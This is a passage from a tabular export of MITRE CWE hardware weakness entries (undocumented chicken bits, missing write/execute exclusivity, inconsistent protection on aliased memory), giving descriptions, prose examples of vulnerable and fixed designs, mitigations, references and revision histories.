"ExampleCode": "| Register | Field description | \n| --- | --- |\n| CRITICAL_TEMP_LIMIT | [31:8] Reserved field; Read only; Default 0 [7:0] Critical temp 0-255 Centigrade; Read-write-lock; Default 125 |\n| TEMP_SENSOR_CALIB | [31:0] Thermal sensor calibration data. A slope value used to map sensor reading to a degree Centigrade. Read-write; Default 25 |\n| TEMP_SENSOR_LOCK | [31:1] Reserved field; Read only; Default 0 [0] Lock bit, locks CRITICAL_TEMP_LIMIT register; Write-1-once; Default 0 |\n| TEMP_HW_SHUTDOWN | [31:2] Reserved field; Read only; Default 0 [1] Enable hardware shutdown on a critical temperature detection; Read-write; Default 0 |\n| CURRENT_TEMP | [31:8] Reserved field; Read only; Default 0 [7:0] Current Temp 0-255 Centigrade; Read-only; Default 0 |",
"IntroText": null,
"Language": "Other",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "In this example note that only the CRITICAL_TEMP_LIMIT register is protected by the TEMP_SENSOR_LOCK bit, while the security design intent is to protect any modification of the critical temperature detection and response. \n\n\nThe response of the system, if the system heats to a critical temperature, is controlled by TEMP_HW_SHUTDOWN bit [1], which is not lockable. Also, the TEMP_SENSOR_CALIB register is not protected by the lock bit. \n\n\nBy modifying the temperature sensor calibration, the conversion of the sensor data to a degree centigrade can be changed, such that the current temperature will never be detected to exceed critical temperature value programmed by the protected lock. \n\n\nSimilarly, by modifying the TEMP_HW_SHUTDOWN.Enable bit, the system response detection of the current temperature exceeding critical temperature can be disabled.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "Change TEMP_HW_SHUTDOWN and TEMP_SENSOR_CALIB controls to be locked by TEMP_SENSOR_LOCK. \n\n| | \n|\n| TEMP_SENSOR_CALIB | [31:0] Thermal sensor calibration data. A slope value used to map sensor reading to a degree Centigrade. Read-write-Lock; Default 25; Locked by TEMP_SENSOR_LOCK bit[0] |\n| TEMP_HW_SHUTDOWN | [31:2] Reserved field; Read only; Default 0 [1] Enable hardware shutdown on critical temperature detection; Read-write-Lock; Default 0; Locked by TEMP_SENSOR_LOCK bit[0] |",
"IntroText": null,
"Language": null,
"Nature": "Good",
"Reference": null
}
],
"ID": null
}
] | null | null | null | null | 3
|
[
[
"284",
"1233"
],
[
"664",
"662",
"667",
"1233"
],
[
"691",
"662",
"667",
"1233"
]
] |
[] |
1242
|
Inclusion of Undocumented Features or Chicken Bits
|
Base
|
Simple
|
Incomplete
|
The device includes chicken bits or undocumented features that can create entry points for unauthorized actors.
|
A common design practice is to use undocumented bits on a device that can be used to disable certain functional security features. These bits are commonly referred to as "chicken bits". They can facilitate quick identification and isolation of faulty components, features that negatively affect performance, or features that do not provide the required controllability for debug and test. Another way to achieve this is through implementation of undocumented features. An attacker might exploit these interfaces for unauthorized access.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "Not OS-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Operating_System"
},
{
"Class": "Not Architecture-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Architecture"
},
{
"Class": "Not Technology-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Technology"
},
{
"Class": "ICS/OT",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Technology"
}
] | null |
[
{
"Note": null,
"Phase": "Architecture and Design"
},
{
"Note": null,
"Phase": "Implementation"
},
{
"Note": null,
"Phase": "Documentation"
}
] |
[
{
"Impact": [
"Modify Memory",
"Read Memory",
"Execute Unauthorized Code or Commands",
"Gain Privileges or Assume Identity",
"Bypass Protection Mechanism"
],
"Likelihood": null,
"Note": null,
"Scope": [
"Confidentiality",
"Integrity",
"Availability",
"Access Control"
]
}
] |
[
{
"Description": "\n\nThe implementation of chicken bits in a released product is highly discouraged. If implemented at all, ensure that they are disabled in production devices. All interfaces to a device should be documented.\n",
"Effectiveness": "High",
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design",
"Implementation"
],
"Strategy": null
}
] | null | null |
[
{
"EntryID": "Part 4-1",
"EntryName": "Req SD-4",
"MappingFit": null,
"TaxonomyName": "ISA/IEC 62443"
},
{
"EntryID": "Part 4-1",
"EntryName": "Req SVV-3",
"MappingFit": null,
"TaxonomyName": "ISA/IEC 62443"
},
{
"EntryID": "Part 4-2",
"EntryName": "Req CR 2.12",
"MappingFit": null,
"TaxonomyName": "ISA/IEC 62443"
}
] |
[
"212",
"36"
] |
[
{
"Authors": [
"Ali Abbasi",
"Tobias Scharnowski",
"Thorsten Holz"
],
"Edition": null,
"ExternalReferenceID": "REF-1071",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": null,
"Publisher": null,
"Section": null,
"Title": "Doors of Durin: The Veiled Gate to Siemens S7 Silicon",
"URL": "https://i.blackhat.com/eu-19/Wednesday/eu-19-Abbasi-Doors-Of-Durin-The-Veiled-Gate-To-Siemens-S7-Silicon.pdf",
"URLDate": null
},
{
"Authors": [
"Sergei Skorobogatov",
"Christopher Woods"
],
"Edition": null,
"ExternalReferenceID": "REF-1072",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": null,
"Publisher": null,
"Section": null,
"Title": "Breakthrough Silicon Scanning Discovers Backdoor in Military Chip",
"URL": "https://www.cl.cam.ac.uk/~sps32/Silicon_scan_draft.pdf",
"URLDate": null
},
{
"Authors": [
"Chris Domas"
],
"Edition": null,
"ExternalReferenceID": "REF-1073",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": null,
"Publisher": null,
"Section": null,
"Title": "God Mode Unlocked: Hardware Backdoors in x86 CPUs",
"URL": "https://i.blackhat.com/us-18/Thu-August-9/us-18-Domas-God-Mode-Unlocked-Hardware-Backdoors-In-x86-CPUs.pdf",
"URLDate": null
},
{
"Authors": [
"Jonathan Brossard"
],
"Edition": null,
"ExternalReferenceID": "REF-1074",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": null,
"Publisher": null,
"Section": null,
"Title": "Hardware Backdooring is Practical",
"URL": "https://media.blackhat.com/bh-us-12/Briefings/Brossard/BH_US_12_Brossard_Backdoor_Hacking_Slides.pdf",
"URLDate": null
},
{
"Authors": [
"Sergei Skorabogatov"
],
"Edition": null,
"ExternalReferenceID": "REF-1075",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": null,
"Publisher": null,
"Section": null,
"Title": "Security, Reliability, and Backdoors",
"URL": "https://www.cl.cam.ac.uk/~sps32/SG_talk_SRB.pdf",
"URLDate": null
}
] | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2020-02-13",
"SubmissionName": "Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi",
"SubmissionOrganization": "Intel Corporation",
"SubmissionReleaseDate": "2020-02-24",
"SubmissionVersion": "4.0",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Demonstrative_Examples, Description, Potential_Mitigations, Related_Attack_Patterns",
"ModificationDate": "2020-08-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2022-04-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms",
"ModificationDate": "2023-01-31",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Taxonomy_Mappings",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes, Taxonomy_Mappings",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Taxonomy_Mappings",
"ModificationDate": "2024-02-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": "2024-02-29",
"ModificationVersion": "4.14",
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": "Suggested mappings to ISA/IEC 62443.",
"ContributionDate": "2023-04-25",
"ContributionName": "\"Mapping CWE to 62443\" Sub-Working Group",
"ContributionOrganization": "CWE-CAPEC ICS/OT SIG",
"ContributionReleaseDate": null,
"ContributionType": "Content",
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Contribution",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "284",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null | null |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "Consider a device that comes with various security measures, such as secure boot. The secure-boot process performs firmware-integrity verification at boot time, and this code is stored in a separate SPI-flash device. However, this code contains undocumented \"special access features\" intended to be used only for performing failure analysis and intended to only be unlocked by the device designer.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tAttackers dump the code from the device and then perform reverse engineering to analyze the code. The undocumented, special-access features are identified, and attackers can activate them by sending specific commands via UART before secure-boot phase completes. Using these hidden features, attackers can perform reads and writes to memory via the UART interface. At runtime, the attackers can also execute arbitrary code and dump the entire memory contents.\n```",
"IntroText": null,
"Language": "Other",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "Remove all chicken bits and hidden features that are exposed to attackers. Add authorization schemes that rely on cryptographic primitives to access any features that the manufacturer does not want to expose. Clearly document all interfaces.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": null
}
] | null | null | null | null | 1
|
[
[
"284",
"1242"
]
] |
[] |
1252
|
CPU Hardware Not Configured to Support Exclusivity of Write and Execute Operations
|
Base
|
Simple
|
Incomplete
|
The CPU is not configured to provide hardware support for exclusivity of write and execute operations on memory. This allows an attacker to execute data from all of memory.
|
CPUs provide a special bit that supports exclusivity of write and execute operations. This bit is used to segregate areas of memory to either mark them as code (instructions, which can be executed) or data (which should not be executed). In this way, if a user can write to a region of memory, the user cannot execute from that region and vice versa. This exclusivity provided by special hardware bit is leveraged by the operating system to protect executable space. While this bit is available in most modern processors by default, in some CPUs the exclusivity is implemented via a memory-protection unit (MPU) and memory-management unit (MMU) in which memory regions can be carved out with exact read, write, and execute permissions. However, if the CPU does not have an MMU/MPU, then there is no write exclusivity. Without configuring exclusivity of operations via segregated areas of memory, an attacker may be able to inject malicious code onto memory and later execute it.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "Not OS-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Operating_System"
},
{
"Class": "Not Architecture-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Architecture"
},
{
"Class": null,
"Name": "Microcontroller Hardware",
"Prevalence": "Undetermined",
"Type": "Technology"
},
{
"Class": null,
"Name": "Processor Hardware",
"Prevalence": "Undetermined",
"Type": "Technology"
}
] | null |
[
{
"Note": null,
"Phase": "Architecture and Design"
}
] |
[
{
"Impact": [
"Execute Unauthorized Code or Commands"
],
"Likelihood": null,
"Note": null,
"Scope": [
"Confidentiality",
"Integrity"
]
}
] |
[
{
"Description": "\n\nImplement a dedicated bit that can be leveraged by the Operating System to mark data areas as non-executable. If such a bit is not available in the CPU, implement MMU/MPU (memory management unit / memory protection unit).\n",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": null
},
{
"Description": "\n\nIf MMU/MPU are not available, then the firewalls need to be implemented in the SoC interconnect to mimic the write-exclusivity operation.\n",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Integration"
],
"Strategy": null
}
] | null | null | null |
[
"679"
] |
[
{
"Authors": [
"ARM"
],
"Edition": null,
"ExternalReferenceID": "REF-1076",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": null,
"Publisher": null,
"Section": null,
"Title": "Cortex-R4 Manual",
"URL": "https://developer.arm.com/Processors/Cortex-M4",
"URLDate": "2023-04-07"
},
{
"Authors": [
"Intel"
],
"Edition": null,
"ExternalReferenceID": "REF-1077",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": null,
"Publisher": null,
"Section": null,
"Title": "MCS 51 Microcontroller Family User's Manual",
"URL": "http://web.mit.edu/6.115/www/document/8051.pdf",
"URLDate": null
},
{
"Authors": [
"ARM"
],
"Edition": null,
"ExternalReferenceID": "REF-1078",
"Publication": null,
"PublicationDay": null,
"PublicationMonth": null,
"PublicationYear": null,
"Publisher": null,
"Section": null,
"Title": "Memory Protection Unit (MPU)",
"URL": "https://web.archive.org/web/20200630034848/https://static.docs.arm.com/100699/0100/armv8m_architecture_memory_protection_unit_100699_0100_00_en.pdf",
"URLDate": "2023-04-07"
}
] | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2020-02-13",
"SubmissionName": "Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi",
"SubmissionOrganization": "Intel Corporation",
"SubmissionReleaseDate": "2020-02-24",
"SubmissionVersion": "4.0",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2020-08-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Related_Attack_Patterns",
"ModificationDate": "2022-04-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms",
"ModificationDate": "2022-06-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated References, Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "284",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null | null |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "MCS51 Microcontroller (based on 8051) does not have a special bit to support write exclusivity. It also does not have an MMU/MPU support. The Cortex-M CPU has an optional MPU that supports up to 8 regions.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": null,
"ExampleCode": "```\n\tThe optional MPU is not configured.\n```",
"IntroText": null,
"Language": "Other",
"Nature": "Bad",
"Reference": null
},
{
"BodyText": "If the MPU is not configured, then an attacker will be able to inject malicious data into memory and execute it.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": null
}
] | null | null | null | null | 1
|
[
[
"284",
"1252"
]
] |
[] |
1257
|
Improper Access Control Applied to Mirrored or Aliased Memory Regions
|
Base
|
Simple
|
Incomplete
|
Aliased or mirrored memory regions in hardware designs may have inconsistent read/write permissions enforced by the hardware. A possible result is that an untrusted agent is blocked from accessing a memory region but is not blocked from accessing the corresponding aliased memory region.
|
Hardware product designs often need to implement memory protection features that enable privileged software to define isolated memory regions and access control (read/write) policies. Isolated memory regions can be defined on different memory spaces in a design (e.g. system physical address, virtual address, memory mapped IO).
Each memory cell should be mapped and assigned a system address that the core software can use to read/write to that memory. It is possible to map the same memory cell to multiple system addresses such that read/write to any of the aliased system addresses would be decoded to the same memory cell.
This is commonly done in hardware designs for redundancy and simplifying address decoding logic. If one of the memory regions is corrupted or faulty, then that hardware can switch to using the data in the mirrored memory region. Memory aliases can also be created in the system address map if the address decoder unit ignores higher order address bits when mapping a smaller address region into the full system address.
A common security weakness that can exist in such memory mapping is that aliased memory regions could have different read/write access protections enforced by the hardware such that an untrusted agent is blocked from accessing a memory address but is not blocked from accessing the corresponding aliased memory address. Such inconsistency can then be used to bypass the access protection of the primary memory block and read or modify the protected memory.
An untrusted agent could also possibly create memory aliases in the system address map for malicious purposes if it is able to change the mapping of an address region or modify memory region sizes.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "Not OS-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Operating_System"
},
{
"Class": "Not Architecture-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Architecture"
},
{
"Class": null,
"Name": "Memory Hardware",
"Prevalence": "Undetermined",
"Type": "Technology"
},
{
"Class": null,
"Name": "Processor Hardware",
"Prevalence": "Undetermined",
"Type": "Technology"
},
{
"Class": null,
"Name": "Microcontroller Hardware",
"Prevalence": "Undetermined",
"Type": "Technology"
},
{
"Class": null,
"Name": "Network on Chip Hardware",
"Prevalence": "Undetermined",
"Type": "Technology"
},
{
"Class": "System on Chip",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Technology"
}
] | null |
[
{
"Note": null,
"Phase": "Architecture and Design"
},
{
"Note": null,
"Phase": "Implementation"
}
] |
[
{
"Impact": [
"Read Memory"
],
"Likelihood": [
"High"
],
"Note": null,
"Scope": [
"Confidentiality"
]
},
{
"Impact": [
"Modify Memory"
],
"Likelihood": [
"High"
],
"Note": null,
"Scope": [
"Integrity"
]
},
{
"Impact": [
"DoS: Instability"
],
"Likelihood": [
"High"
],
"Note": null,
"Scope": [
"Availability"
]
}
] |
[
{
"Description": "The checks should be applied for consistency access rights between primary memory regions and any mirrored or aliased memory regions. If different memory protection units (MPU) are protecting the aliased regions, their protected range definitions and policies should be synchronized.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design",
"Implementation"
],
"Strategy": null
},
{
"Description": "The controls that allow enabling memory aliases or changing the size of mapped memory regions should only be programmable by trusted software components.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design",
"Implementation"
],
"Strategy": null
}
] | null | null | null |
[
"456",
"679"
] | null | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2020-04-29",
"SubmissionName": "Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi",
"SubmissionOrganization": "Intel Corporation",
"SubmissionReleaseDate": "2020-02-24",
"SubmissionVersion": "4.1",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples, Description, Modes_of_Introduction, Potential_Mitigations, Related_Attack_Patterns",
"ModificationDate": "2020-08-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Potential_Mitigations",
"ModificationDate": "2021-10-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Related_Attack_Patterns",
"ModificationDate": "2022-04-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms",
"ModificationDate": "2022-06-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples",
"ModificationDate": "2022-10-13",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2023-01-31",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
